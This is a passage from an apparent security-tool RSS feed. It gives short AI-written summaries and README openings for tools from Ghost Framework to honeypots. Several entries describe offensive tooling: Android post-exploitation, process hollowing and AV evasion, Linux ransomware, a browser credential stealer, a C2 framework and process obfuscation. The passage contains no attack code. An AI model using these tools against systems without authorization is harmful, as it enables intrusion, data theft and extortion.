&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ghost Framework is an Android post-exploitation framework that leverages the Android Debug Bridge to enable remote access to Android devices. Its primary use case is for penetration testing and security assessments of Android applications and devices. Notable features include ease of installation via pip and a focus on facilitating comprehensive exploitation scenarios.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h3 align="center"&gt;
 &lt;img src="https://user-images.githubusercontent.com/54115104/116760735-6da1e780-aa1e-11eb-8c6f-530386487671.png" alt="logo" height="250px"&gt;
&lt;/h3&gt;
&lt;p align="center"&gt;
 &lt;b&gt;Ghost Framework&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="https://entysec.com"&gt;
 &lt;img src="https://img.shields.io/badge/developer-EntySec-blue.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/EntySec/Ghost"&gt;
 &lt;img src="https://img.shields.io/badge/language-Python-blue.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/EntySec/Ghost/forks"&gt;
 &lt;img src="https://img.shields.io/github/forks/EntySec/Ghost?style=flat&amp;color=green"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/EntySec/Ghost/stargazers"&gt;
 &lt;img src="https://img.shields.io/github/stars/EntySec/Ghost?style=flat&amp;color=yellow"&gt;
 &lt;/a&gt;
 &lt;a href="https://www.codefactor.io/repository/github/entysec/ghost"&gt;
 &lt;img src="https://www.codefactor.io/repository/github/entysec/ghost/badge"&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 Ghost Framework is an Android post-exploitation framework that
 &lt;br&gt;exploits the Android Debug Bridge to remotely access an Android device.
 &lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;Installation&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;code&gt;pip3 install git+https://github.com/EntySec/Ghost&lt;/code&gt;
&lt;/p&gt;</description></item><item><title>GhostStrike</title><link>https://rainmana.github.io/hackyfeed/tools/stivenhacker-ghoststrike/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/stivenhacker-ghoststrike/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GhostStrike is a sophisticated cybersecurity tool developed for Red Team operations, utilizing techniques such as process hollowing and dynamic API resolution to execute covert actions on Windows systems while evading detection. Its notable features include shellcode encoding/decoding, cryptographic key generation for enhanced security, and control flow flattening to complicate analysis efforts. Designed for educational use in controlled environments, GhostStrike emphasizes the importance of responsible usage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ghoststrike-"&gt;GhostStrike ⚔️&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;GhostStrike&lt;/strong&gt; is an advanced cybersecurity tool designed for Red Team operations, featuring sophisticated techniques to evade detection and perform process hollowing on Windows systems.&lt;/p&gt;</description></item><item><title>Ghostwriter</title><link>https://rainmana.github.io/hackyfeed/tools/ghostmanager-ghostwriter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ghostmanager-ghostwriter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ghostwriter is an open-source platform that streamlines offensive security operations by facilitating report writing, asset tracking, and assessment management. Key features include a robust reporting engine with customizable templates, role-based access controls, and integrations with tools like Mythic C2 and Cobalt Strike for automatic activity logging. The platform enhances collaboration among red teams and consultants by providing a centralized environment to manage client information and generate comprehensive reports in various formats.&lt;/p&gt;</description></item><item><title>GitFive</title><link>https://rainmana.github.io/hackyfeed/tools/mxrch-gitfive/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mxrch-gitfive/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GitFive is an OSINT tool designed for investigating GitHub profiles, enabling users to track username histories, variations, and associated email addresses. Key features include the ability to discover GitHub accounts from lists of emails, analyze repositories, and generate possible email combinations, all while operating efficiently within GitHub&amp;rsquo;s API rate limits. The tool also supports features like SSH key dumping and JSON exports for ease of data handling.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="assets/banner.png" alt=""&gt;&lt;/p&gt;</description></item><item><title>gitjacker</title><link>https://rainmana.github.io/hackyfeed/tools/liamg-gitjacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/liamg-gitjacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Gitjacker is a tool designed to retrieve git repositories and their contents from web servers where the &lt;code&gt;.git&lt;/code&gt; directory has been unintentionally exposed. It effectively extracts repository data even when directory listings are disabled, making it suitable for educational purposes and penetration testing. Notable features include ease of installation via a simple script and the ability to operate in scenarios where access to traditional repository resources is restricted.&lt;/p&gt;</description></item><item><title>goblin</title><link>https://rainmana.github.io/hackyfeed/tools/m4b-goblin/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m4b-goblin/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; libgoblin is a versatile Rust library for binary parsing, loading, and analysis, supporting multiple formats including ELF, Mach-O, and PE across both 32-bit and 64-bit architectures. Its notable features include zero-copy parsing, cross-platform capabilities, endian-awareness, and extensive configurability, allowing users to adapt it to various binary analysis tasks while maintaining a lightweight and efficient footprint. The library is designed for use cases ranging from compiler development to binary analysis tools, making it a comprehensive solution for developers working with binary data.&lt;/p&gt;</description></item><item><title>GonnaCry</title><link>https://rainmana.github.io/hackyfeed/tools/tarcisio-marinho-gonnacry/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tarcisio-marinho-gonnacry/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GonnaCry is a Linux-based ransomware designed to encrypt user files using a robust AES-256-CBC encryption scheme, featuring per-file random AES keys and initialization vectors. Its primary use case is to serve as an educational tool for understanding malware, cryptography, and operating systems, with capabilities such as communicating with a server for key management, altering system wallpapers, and terminating database services. Notable features include a built-in decryptor and the use of RSA-2048 for secure key encryption, making it a comprehensive demonstration of ransomware mechanics.&lt;/p&gt;</description></item><item><title>greenmask</title><link>https://rainmana.github.io/hackyfeed/tools/greenmaskio-greenmask/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/greenmaskio-greenmask/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Greenmask is an open-source utility designed for logical database dumping, anonymization, and synthetic data generation, primarily targeting PostgreSQL with ongoing support for MySQL. It enables users to create smaller, referentially intact development databases while offering features such as deterministic transformations, dynamic parameters, and storage support for S3-compatible systems, ensuring flexibility and data integrity. Ideal for sanitizing sensitive data, backing up and restoring databases, and streamlining local development processes, Greenmask operates statelessly and produces outputs compatible with standard database tools.&lt;/p&gt;</description></item><item><title>GTFOBins.github.io</title><link>https://rainmana.github.io/hackyfeed/tools/gtfobins-gtfobins.github.io/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gtfobins-gtfobins.github.io/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GTFOBins is a curated repository that catalogs Unix-like executables capable of circumventing local security restrictions in improperly configured systems. Its primary use case is to aid security professionals and penetration testers in identifying and exploiting misconfigurations. Notable features include a comprehensive database of binaries and detailed usage instructions for different scenarios.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="gtfobins"&gt;GTFOBins&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/GTFOBins/GTFOBins.github.io/actions?query=workflow:CI"&gt;&lt;img src="https://github.com/GTFOBins/GTFOBins.github.io/actions/workflows/ci.yml/badge.svg" alt="CI status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/GTFOBins/GTFOBins.github.io/actions?query=workflow:Pages"&gt;&lt;img src="https://github.com/GTFOBins/GTFOBins.github.io/actions/workflows/pages.yml/badge.svg" alt="CI status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/sponsors/GTFOBins"&gt;&lt;img src="https://img.shields.io/static/v1?label=Sponsor&amp;amp;message=%E2%9D%A4&amp;amp;color=%23db61a2" alt="Sponsor"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://gtfobins.org"&gt;&lt;img align="right" src="assets/logo.png" style="width: 100px" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;GTFOBins is a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems.&lt;/p&gt;</description></item><item><title>guardian-cli</title><link>https://rainmana.github.io/hackyfeed/tools/zakirkun-guardian-cli/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zakirkun-guardian-cli/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Guardian is an AI-powered penetration testing automation platform designed for enterprise environments, integrating multiple AI providers with extensive security tools to perform intelligent and adaptive security assessments. It features a multi-agent architecture for strategic decision-making, 19 integrated security tools for thorough testing, and enhanced evidence capture for complete traceability of findings. Users must ensure authorized access before conducting tests, adhering to legal and ethical guidelines.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;img src="docs/logo.svg" alt="Guardian Logo" width="200" /&gt;
&lt;h1 id="-guardian"&gt;🔐 Guardian&lt;/h1&gt;
&lt;h3 id="ai-powered-penetration-testing-automation-platform"&gt;AI-Powered Penetration Testing Automation Platform&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://opensource.org/licenses/MIT"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg" alt="License: MIT"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/"&gt;&lt;img src="https://img.shields.io/badge/python-3.11+-blue.svg" alt="Python 3.11+"&gt;&lt;/a&gt;
&lt;a href="https://github.com/psf/black"&gt;&lt;img src="https://img.shields.io/badge/code%20style-black-000000.svg" alt="Code style: black"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>HaboMalHunter</title><link>https://rainmana.github.io/hackyfeed/tools/tencent-habomalhunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tencent-habomalhunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HaboMalHunter is an automated malware analysis tool specifically designed for Linux ELF files, facilitating both static and dynamic analysis to aid security analysts. It efficiently extracts crucial features such as process behavior, file I/O, and network interactions, generating comprehensive reports on malicious activities. Notable features include detailed static analysis of file dependencies and strings, as well as dynamic tracking of execution timestamps, API calls, and syscall sequences.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="habomalhunter-habo-linux-malware-analysis-system"&gt;HaboMalHunter: Habo Linux Malware Analysis System&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://www.blackhat.com/asia-17/arsenal.html#habomalhunter-an-automated-malware-analysis-tool-for-linux-elf-files"&gt;&lt;img src="https://cdn.rawgit.com/toolswatch/badges/master/arsenal/2017.svg" alt="BlackHat"&gt;&lt;/a&gt;
&lt;a href="https://github.com/Tencent/HaboMalHunter/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat" alt="license"&gt;&lt;/a&gt;
&lt;a href="https://github.com/Tencent/HaboMalHunter/pulls"&gt;&lt;img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg" alt="PRs Welcome"&gt;&lt;/a&gt;
&lt;a href="https://github.com/Tencent/HaboMalHunter/wiki"&gt;&lt;img src="https://img.shields.io/badge/Platform-Linux-brightgreen.svg" alt="Platform"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>HackBrowserData</title><link>https://rainmana.github.io/hackyfeed/tools/moond4rk-hackbrowserdata/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/moond4rk-hackbrowserdata/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackBrowserData is a command-line utility designed for decrypting and exporting sensitive data, such as passwords, cookies, and browsing history, from various popular web browsers on Windows, macOS, and Linux. Its notable features include support for the latest encryption standards, like AES-256-CBC for Firefox 144 and beyond, and comprehensive compatibility with a wide range of browsers including Google Chrome, Microsoft Edge, and Opera. The tool emphasizes its intended use for security research while disclaiming legal responsibilities associated with its application.&lt;/p&gt;</description></item><item><title>hackdroid</title><link>https://rainmana.github.io/hackyfeed/tools/thehackingsage-hackdroid/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thehackingsage-hackdroid/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackDroid is a comprehensive collection of penetration testing and security-related applications tailored for Android devices. It organizes applications into diverse categories, including forensics, networking, and cryptography, to facilitate easy access and download, while emphasizing the necessity of root permissions and ethical use cases. Notable features include a wide range of tools for various hacking and security tasks, and guidance for use on secondary devices to mitigate risks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
	&lt;a href="https://thehackingsage.com/hackdroid/"&gt;&lt;img src="https://thehackingsage.com/hackdroid/assets/img/hackdroid/logo.png" alt="HACKDROID"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Hacker-Roadmap</title><link>https://rainmana.github.io/hackyfeed/tools/hacking-notes-hacker-roadmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hacking-notes-hacker-roadmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Hacker Roadmap is a comprehensive guide designed to assist individuals at various stages of their cybersecurity journey, from hobbyists to those pursuing certifications or degrees. It outlines multiple pathways tailored to specific goals, such as becoming a bug bounty hunter or quickly entering the cybersecurity workforce. Notable features include structured roadmaps, visual resources, and links to additional hacking aids for both red and blue team strategies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="hacker-roadmap"&gt;Hacker Roadmap&lt;/h1&gt;
&lt;p&gt;Are you ready to embark on an electrifying journey into the depths of cybersecurity? Whether you&amp;rsquo;re eyeing a prestigious certification, gearing up for a Bachelor&amp;rsquo;s degree, or simply indulging your insatiable curiosity, this roadmap is your ultimate guide to becoming a true hacking virtuoso. But before we dive into the nitty-gritty, let&amp;rsquo;s set the stage. Are you in it for the thrill, the challenge, or perhaps envisioning a career at the cutting edge of cyber defense? Your motivations will shape the path ahead, so let&amp;rsquo;s chart a course tailored precisely to your aspirations.&lt;/p&gt;</description></item><item><title>hackerpro</title><link>https://rainmana.github.io/hackyfeed/tools/jaykali-hackerpro/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jaykali-hackerpro/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackerPro is a comprehensive pentesting toolkit designed for security professionals, offering a wide array of tools for information gathering, password attacks, wireless testing, web hacking, and post-exploitation. Notable features include Nmap for network scanning, sqlmap for SQL injection, and a suite of tools for scanning and exploiting web applications. This tool facilitates multi-faceted penetration testing, making it essential for those engaged in cybersecurity assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/technicaldada/jaykali/issues"&gt;&lt;img src="https://img.shields.io/github/issues/jaykali/hackerpro.svg" alt="GitHub issues"&gt;&lt;/a&gt;
&lt;a href="https://github.com/jaykali/hackerpro/network"&gt;&lt;img src="https://img.shields.io/github/forks/jaykali/hackerpro.svg" alt="GitHub forks"&gt;&lt;/a&gt;
&lt;a href="https://github.com/jaykali/hackerpro/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/jaykali/hackerpro.svg" alt="GitHub stars"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>HackGpt</title><link>https://rainmana.github.io/hackyfeed/tools/yashab-cyber-hackgpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/yashab-cyber-hackgpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackGPT Enterprise is an AI-powered penetration testing platform tailored for enterprise security teams, designed to deliver comprehensive cybersecurity assessments through its advanced AI and machine learning capabilities. Key features include multi-model support for AI engines, automated reporting, robust compliance frameworks, and a cloud-native microservices architecture that enhances performance and scalability. Its tools for zero-day detection, risk intelligence, and extensive reporting ensure that organizations maintain a proactive stance against security threats.&lt;/p&gt;</description></item><item><title>hacking-online-games</title><link>https://rainmana.github.io/hackyfeed/tools/dsasmblr-hacking-online-games/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dsasmblr-hacking-online-games/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;hacking-online-games&amp;rdquo; repository serves as a comprehensive compilation of tutorials and resources focused on hacking online games, including techniques for reverse engineering game clients and decrypting network protocols. It emphasizes the community-driven aspect of sharing knowledge and resources, inviting contributions and updates from users. Notably, it includes links to articles, presentations, and discussions that provide insights into various methods and legal considerations related to game hacking.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;a href="https://guidedhacking.com/?utm_source=dsasmblr"&gt;
 &lt;img src="https://raw.githubusercontent.com/dsasmblr/hacking-online-games/master/resources/guidedhacking-hero.png" /&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;span align="center"&gt;&lt;a href="https://guidedhacking.com/?utm_source=dsasmblr"&gt;This repo is sponsored by GuidedHacking.com!&lt;/a&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;h1 id="the-ultimate-online-game-hacking-resource"&gt;&lt;a href="https://github.com/dsasmblr/hacking-online-games/"&gt;The Ultimate Online Game Hacking Resource&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;A curated list of tutorials/resources for hacking online games!&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>hacking-resources</title><link>https://rainmana.github.io/hackyfeed/tools/lifka-hacking-resources/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lifka-hacking-resources/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Lifka/hacking-resources repository is a curated collection of hacking utilities and cheat sheets, aimed at assisting cybersecurity professionals and enthusiasts in their studies. It includes a variety of resources such as tools, OS distributions, tutorials, and specific cheat sheets for cloud, web, network, and system hacking. Notable features involve a comprehensive index and contributions from the community, facilitating an ongoing accumulation of valuable cybersecurity knowledge.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="hacking-resources-and-cheat-sheets"&gt;Hacking resources and cheat sheets&lt;/h1&gt;
&lt;!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section --&gt;
&lt;p&gt;&lt;a href="#contributors-"&gt;&lt;img src="https://img.shields.io/badge/all_contributors-0-orange.svg?style=flat-square" alt="All Contributors"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Hacking-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/yogsec-hacking-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/yogsec-hacking-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hacking-Tools is a curated collection of penetration testing and ethical hacking utilities, including essential tools from Kali Linux. It is organized into categories such as information gathering, vulnerability analysis, and exploitation tools, facilitating easy navigation and use. Notable features include a featured tool, BugBoard, designed to automate vulnerability detection for bug bounty hunters and security researchers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="hacking-tools"&gt;Hacking-Tools&lt;/h1&gt;
&lt;div align="center" style="margin: 30px 0;"&gt;
A curated list of penetration testing and ethical hacking tools, organized by category. This collection includes Kali Linux tools and other notable utilities.
&lt;/br&gt;
&lt;p&gt;&lt;img src="https://media0.giphy.com/media/v1.Y2lkPTc5MGI3NjExdHJjMXpvb2hkdXJvN2Y3cmllNG81YXNsem90ejhwY2NqbXB5OXgzaiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/137EaR4vAOCn1S/giphy.gif" alt="Hacking Anime"&gt;&lt;/p&gt;</description></item><item><title>hackingBuddyGPT</title><link>https://rainmana.github.io/hackyfeed/tools/ipa-lab-hackingbuddygpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ipa-lab-hackingbuddygpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackingBuddyGPT is a tool designed to assist security researchers in leveraging large language models (LLMs) for discovering new attack vectors, enabling efficient penetration testing and security assessments in 50 lines of code or less. Notable features include support for SSH connections to remote targets and local shell execution, enhancing testing capabilities while maintaining awareness of potential risks to live environments. The framework also provides reusable benchmarks for Linux privilege escalation and comparative analyses of multiple LLMs to facilitate optimal usage in security tasks.&lt;/p&gt;</description></item><item><title>hal</title><link>https://rainmana.github.io/hackyfeed/tools/emsec-hal/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/emsec-hal/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HAL is a sophisticated framework designed for netlist reverse engineering and manipulation, allowing users to parse and analyze netlists from various hardware sources, such as FPGAs and ASICs, into a graph-based representation. Key features include high performance through an optimized C++ core, flexibility via Python bindings, a modular plugin system for extended functionality, and a rich GUI for visual inspection and interactive analysis. The tool aims to serve as a common baseline for researchers and analysts in the field of hardware reverse engineering, facilitating reproducibility and efficiency in research efforts.&lt;/p&gt;</description></item><item><title>Heroinn</title><link>https://rainmana.github.io/hackyfeed/tools/b23r0-heroinn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/b23r0-heroinn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Heroinn is a cross-platform command-and-control (C2) and post-exploitation framework developed in Rust, designed primarily for research and educational purposes. Notable features include a graphical user interface (GUI), an interactive PTY shell, system information collection, file management with support for large files and resuming broken transfers, and compatibility with multiple operating systems including Windows, Linux, BSD, and macOS, leveraging various communication protocols such as TCP, HTTP, and reliable UDP.&lt;/p&gt;</description></item><item><title>herpaderping</title><link>https://rainmana.github.io/hackyfeed/tools/jxy-s-herpaderping/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jxy-s-herpaderping/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Herpaderping is a process obfuscation tool that manipulates the content of a file on disk after it has been mapped for execution, thereby misleading security products and the operating system about the actual process being run. Its primary use case is to facilitate stealthy execution of binaries by exploiting the timing of process creation callbacks and on-write scanning mechanisms, allowing an actor to modify the file after mapping but before the process starts. Notable features include the ability to remain undetected during file inspections and the execution of a binary while obscuring its original content through a specific workflow of creating, mapping, modifying, and executing targets.&lt;/p&gt;</description></item><item><title>hexstrike-ai</title><link>https://rainmana.github.io/hackyfeed/tools/0x4m4-hexstrike-ai/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0x4m4-hexstrike-ai/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HexStrike AI is an advanced penetration testing platform that integrates over 150 security tools and more than 12 autonomous AI agents for automated cybersecurity assessment. Its primary use case focuses on cybersecurity automation, employing intelligent decision-making and vulnerability intelligence to optimize attack strategies and resource management. Notable features include real-time dashboards, progress visualization, and a multi-agent architecture that facilitates comprehensive penetration testing and threat analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;img src="assets/hexstrike-logo.png" alt="HexStrike AI Logo" width="220" style="margin-bottom: 20px;"/&gt;
&lt;h1 id="hexstrike-ai-mcp-agents-v60"&gt;HexStrike AI MCP Agents v6.0&lt;/h1&gt;
&lt;h3 id="ai-powered-mcp-cybersecurity-automation-platform"&gt;AI-Powered MCP Cybersecurity Automation Platform&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.python.org/"&gt;&lt;img src="https://img.shields.io/badge/Python-3.8%2B-blue.svg" alt="Python"&gt;&lt;/a&gt;
&lt;a href="LICENSE"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-green.svg" alt="License"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/badge/Security-Penetration%20Testing-red.svg" alt="Security"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/badge/MCP-Compatible-purple.svg" alt="MCP"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai/releases"&gt;&lt;img src="https://img.shields.io/badge/Version-6.0.0-orange.svg" alt="Version"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/badge/Security%20Tools-150%2B-brightgreen.svg" alt="Tools"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/badge/AI%20Agents-12%2B-purple.svg" alt="Agents"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/github/stars/0x4m4/hexstrike-ai?style=social" alt="Stars"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>hidden</title><link>https://rainmana.github.io/hackyfeed/tools/jkornev-hidden/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jkornev-hidden/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hidden is a Windows driver designed for reverse engineering and research purposes, enabling users to conceal specific environmental indicators on their machines, such as debugging tools and virtual machine infrastructure. It offers advanced features to hide registry keys, files, directories, and processes, while providing a usermode interface through a library and command-line interface for comprehensive management capabilities. Notably, it includes the functionality to protect specific processes and exclude others from hiding features, all compatible with Windows Vista and later versions.&lt;/p&gt;</description></item><item><title>hollows_hunter</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-hollows_hunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-hollows_hunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hollows Hunter is a command-line tool designed to identify and dump potentially malicious implants in processes by utilizing the PE-sieve passive memory scanner. Its primary use case includes scanning processes based on various criteria, such as process name and creation time, and it offers capabilities for continuous memory scanning and ETW listening. Notable features include the ability to scan all processes if no specific targets are specified, and support for multiple input criteria for enhanced targeting.&lt;/p&gt;</description></item><item><title>honeypots</title><link>https://rainmana.github.io/hackyfeed/tools/qeeqbox-honeypots/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/qeeqbox-honeypots/</guid><description>&lt;blockquote&gt;
